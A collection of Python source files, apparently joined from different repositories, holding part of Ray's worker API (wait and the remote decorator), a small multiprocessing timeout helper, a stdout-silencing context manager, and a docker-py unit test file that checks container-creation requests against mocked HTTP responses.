list corresponds to the rest of the object IDs (which may or may not be
ready).
Ordering of the input list of object IDs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
Args:
object_ids (List[ObjectID]): List of object IDs for objects that may or
may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object IDs that should be returned.
timeout (int): The maximum amount of time in milliseconds to wait
before returning.
Returns:
A list of object IDs that are ready and a list of the remaining object
IDs.
"""
if isinstance(object_ids, ray.ObjectID):
raise TypeError(
"wait() expected a list of ObjectID, got a single ObjectID")
if not isinstance(object_ids, list):
raise TypeError("wait() expected a list of ObjectID, got {}".format(
type(object_ids)))
if worker.mode != LOCAL_MODE:
for object_id in object_ids:
if not isinstance(object_id, ray.ObjectID):
raise TypeError("wait() expected a list of ObjectID, "
"got list containing {}".format(
type(object_id)))
worker.check_connected()
with profiling.profile("ray.wait", worker=worker):
check_main_thread()
# When Ray is run in LOCAL_MODE, all functions are run immediately,
# so all objects in object_ids are ready.
if worker.mode == LOCAL_MODE:
return object_ids[:num_returns], object_ids[num_returns:]
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_ids) == 0:
return [], []
if len(object_ids) != len(set(object_ids)):
raise Exception("Wait requires a list of unique object IDs.")
if num_returns <= 0:
raise Exception(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_ids):
raise Exception("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 2**30
if worker.use_raylet:
ready_ids, remaining_ids = worker.local_scheduler_client.wait(
object_ids, num_returns, timeout, False)
else:
object_id_strs = [
plasma.ObjectID(object_id.id()) for object_id in object_ids
]
ready_ids, remaining_ids = worker.plasma_client.wait(
object_id_strs, timeout, num_returns)
ready_ids = [
ray.ObjectID(object_id.binary()) for object_id in ready_ids
]
remaining_ids = [
ray.ObjectID(object_id.binary()) for object_id in remaining_ids
]
return ready_ids, remaining_ids
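# Illustrative sketch (not part of the original module): splitting a list of
# object IDs into ready and not-ready subsets with wait. The remote function
# f is hypothetical.
def _example_wait_usage():
    @remote
    def f(i):
        return i

    ids = [f.remote(i) for i in range(4)]
    # Block until at least 2 of the 4 results are in the object store, or
    # until 500 ms have elapsed, whichever comes first.
    ready, not_ready = wait(ids, num_returns=2, timeout=500)
    return get(ready), not_ready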
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to serialize
remote functions, we don't attempt to serialize the worker object, which
cannot be serialized.
"""
return worker.mode
def get_global_worker():
return global_worker
def make_decorator(num_return_vals=None,
num_cpus=None,
num_gpus=None,
resources=None,
max_calls=None,
checkpoint_interval=None,
worker=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if checkpoint_interval is not None:
raise Exception("The keyword 'checkpoint_interval' is not "
"allowed for remote functions.")
return ray.remote_function.RemoteFunction(
function_or_class, num_cpus, num_gpus, resources,
num_return_vals, max_calls)
if inspect.isclass(function_or_class):
if num_return_vals is not None:
raise Exception("The keyword 'num_return_vals' is not allowed "
"for actors.")
if max_calls is not None:
raise Exception("The keyword 'max_calls' is not allowed for "
"actors.")
# Set the actor default resources.
if num_cpus is None and num_gpus is None and resources is None:
# In the default case, actors acquire no resources for
# their lifetime, and actor methods will require 1 CPU.
cpus_to_use = DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE
actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE
else:
# If any resources are specified, then all resources are
# acquired for the actor's lifetime and no resources are
# associated with methods.
cpus_to_use = (DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE
if num_cpus is None else num_cpus)
actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE
return worker.make_actor(function_or_class, cpus_to_use, num_gpus,
resources, actor_method_cpus,
checkpoint_interval)
raise Exception("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
def remote(*args, **kwargs):
"""Define a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo(object):
def method(self):
return 1
It can also be used with specific keyword arguments:
* **num_return_vals:** This is only for *remote functions*. It specifies
the number of object IDs returned by the remote function invocation.
* **num_cpus:** The quantity of CPU cores to reserve for this task or for
the lifetime of the actor.
* **num_gpus:** The quantity of GPUs to reserve for this task or for the
lifetime of the actor.
* **resources:** The quantity of various custom resources to reserve for
this task or for the lifetime of the actor. This is a dictionary mapping
strings (resource names) to numbers.
* **max_calls:** Only for *remote functions*. This specifies the maximum
number of times that a given worker can execute the given remote function
before it must exit (this can be used to address memory leaks in
third-party libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow). By
default this is infinite.
This can be done as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_return_vals=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo(object):
def method(self):
return 1
"""
worker = get_global_worker()
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
"the arguments 'num_return_vals', 'num_cpus', 'num_gpus', "
"'resources', 'max_calls', or 'checkpoint_interval', like "
"'@ray.remote(num_return_vals=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in [
"num_return_vals", "num_cpus", "num_gpus", "resources",
"max_calls", "checkpoint_interval"
], error_string
num_cpus = kwargs.get("num_cpus")
num_gpus = kwargs.get("num_gpus")
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise Exception("The 'resources' keyword argument must be a "
"dictionary, but received type {}.".format(
type(resources)))
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
# Handle other arguments.
num_return_vals = kwargs.get("num_return_vals")
max_calls = kwargs.get("max_calls")
checkpoint_interval = kwargs.get("checkpoint_interval")
return make_decorator(
num_return_vals=num_return_vals,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
max_calls=max_calls,
checkpoint_interval=checkpoint_interval,
worker=worker)
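# Illustrative sketch (not part of the original module): tasks and actors
# declared with the decorator above are invoked through .remote(), which
# returns object IDs rather than values. add and Counter are hypothetical.
def _example_remote_invocation():
    @remote
    def add(a, b):
        return a + b

    @remote
    class Counter(object):
        def __init__(self):
            self.n = 0

        def increment(self):
            self.n += 1
            return self.n

    assert get(add.remote(1, 2)) == 3
    counter = Counter.remote()
    assert get(counter.increment.remote()) == 1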
|
Timer.py
|
import threading
import multiprocessing
import platform
TIME = 0.1 # seconds for one turn
class Timer():
    @staticmethod
    def call_timeout(timeout, func, args=(), kwargs=None):
        """Run func in a separate process and return True if it finishes
        within `timeout` seconds, or False if it had to be terminated."""
        kwargs = kwargs if kwargs is not None else {}
        try:
            p = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
            p.start()
            p.join(timeout)
            if p.is_alive():
                p.terminate()
                return False
            return True
        except Exception:
            print("Exception while probing {} with a {}s timeout".format(
                func, timeout))
            raise

def timeout(func, args=(), kwargs=None, duration=TIME, default=None):
    """Spawn a separate process to check that func finishes within `duration`
    seconds, then run it in the current process.

    Returns `default` if the duration is exceeded, otherwise the result of
    func. NOTE: this is ambiguous if func itself returns `default`.
    """
    kwargs = kwargs if kwargs is not None else {}
    if not callable(func):
        raise TypeError("{} not callable".format(func))
    if platform.system() == "Windows":
        # The multiprocessing-based probe is skipped on Windows.
        return func(*args, **kwargs)
    if Timer.call_timeout(duration, func, args, kwargs):
        return func(*args, **kwargs)
    return default
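# Illustrative sketch (not part of the original module): guarding a possibly
# slow call with the timeout helper above. slow_add is a hypothetical function.
def _example_timeout_usage():
    def slow_add(a, b):
        return a + b
    # Returns 3 if slow_add finishes within 0.5 s, otherwise the default (None).
    return timeout(slow_add, args=(1, 2), duration=0.5)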
from contextlib import contextmanager
import os
import sys
@contextmanager
def silence_stdout():
    """Temporarily redirect sys.stdout to os.devnull."""
    new_target = open(os.devnull, "w")
    old_target = sys.stdout
    sys.stdout = new_target
    try:
        yield new_target
    finally:
        sys.stdout = old_target
        new_target.close()
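# Illustrative sketch (not part of the original module): suppressing prints
# from a noisy call using the context manager above.
def _example_silence_stdout():
    with silence_stdout():
        print("this line is swallowed by os.devnull")
    print("stdout is restored here")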
|
test.py
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import random
import docker
import requests
import six
from . import base
from . import fake_api
from .helpers import make_tree
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
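# Illustrative sketch (not part of the original tests): the response() helper
# above builds a requests.Response whose body is the JSON-encoded content;
# the fake transport functions below return such responses to the client
# under test. The 'Id' payload here is hypothetical.
def _example_fake_response():
    res = response(status_code=200, content={'Id': 'abc123'})
    assert res.status_code == 200
    assert json.loads(res.content.decode('ascii')) == {'Id': 'abc123'}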
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_inspect_container_tty(self, container):
return fake_inspect_container(self, container, tty=True)
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
url_base = 'http+docker://localunixsocket/'
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
@mock.patch.multiple('docker.Client', get=fake_get, post=fake_post,
put=fake_put, delete=fake_delete)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', '/some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/%2Fsome%3Fname/world')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
with pytest.raises(Exception):
self.client.images('busybox', viz=True)
self.fail('Viz output should not be supported!')
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
self.client.images(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
self.client.images(all=True, quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
self.client.images(quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
self.client.images(filters={'dangling': True})
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
self.client.containers(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_networks(self):
networks = [
{
"name": "none",
"id": "8e4e55c6863ef424",
"type": "null",
"endpoints": []
},
{
"name": "host",
"id": "062b6d9ea7913fde",
"type": "host",
"endpoints": []
},
]
get = mock.Mock(return_value=response(
status_code=200, content=json.dumps(networks).encode('utf-8')))
with mock.patch('docker.Client.get', get):
self.assertEqual(self.client.networks(), networks)
self.assertEqual(get.call_args[0][0], url_prefix + 'networks')
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertFalse(filters)
self.client.networks(names=['foo'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'name': ['foo']})
self.client.networks(ids=['123'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'id': ['123']})
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
self.client.create_container('busybox', 'true')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
self.client.create_container('busybox', 'ls',
ports=[1111, (2222, 'udp'), (3333,)])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
self.client.create_container('busybox', 'hello',
entrypoint='cowsay entry')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": ["cowsay", "entry"]}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
self.client.create_container('busybox', 'ls',
cpu_shares=5)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
self.client.create_container('busybox', 'ls',
cpuset='0,1')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cgroup_parent(self):
self.client.create_container(
'busybox', 'ls', host_config=self.client.create_host_config(
cgroup_parent='test'
)
)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
self.assertIn('HostConfig', data)
self.assertIn('CgroupParent', data['HostConfig'])
self.assertEqual(data['HostConfig']['CgroupParent'], 'test')
def test_create_container_with_working_dir(self):
self.client.create_container('busybox', 'ls',
working_dir='/root')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
self.client.create_container('busybox', 'true', stdin_open=True)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
self.client.create_container('busybox', 'true', volumes_from=[])
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit=128.0
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128k'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128m'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128g'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(
data['HostConfig']['Memory'], 128.0 * 1024 * 1024 * 1024
)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='128p'
)
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='1f28'
)
def test_start_container(self):
self.client.start(fake_api.FAKE_CONTAINER_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
with pytest.raises(ValueError) as excinfo:
self.client.start(container=None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
with pytest.raises(ValueError) as excinfo:
self.client.start(None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
def test_start_container_regression_573(self):
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
def test_create_container_with_lxc_conf(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:z"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode_and_ro_error(self):
with pytest.raises(ValueError):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
"ro": True,
}}
)
)
def test_create_container_with_binds_list(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds=[
"/tmp:/mnt/1:ro",
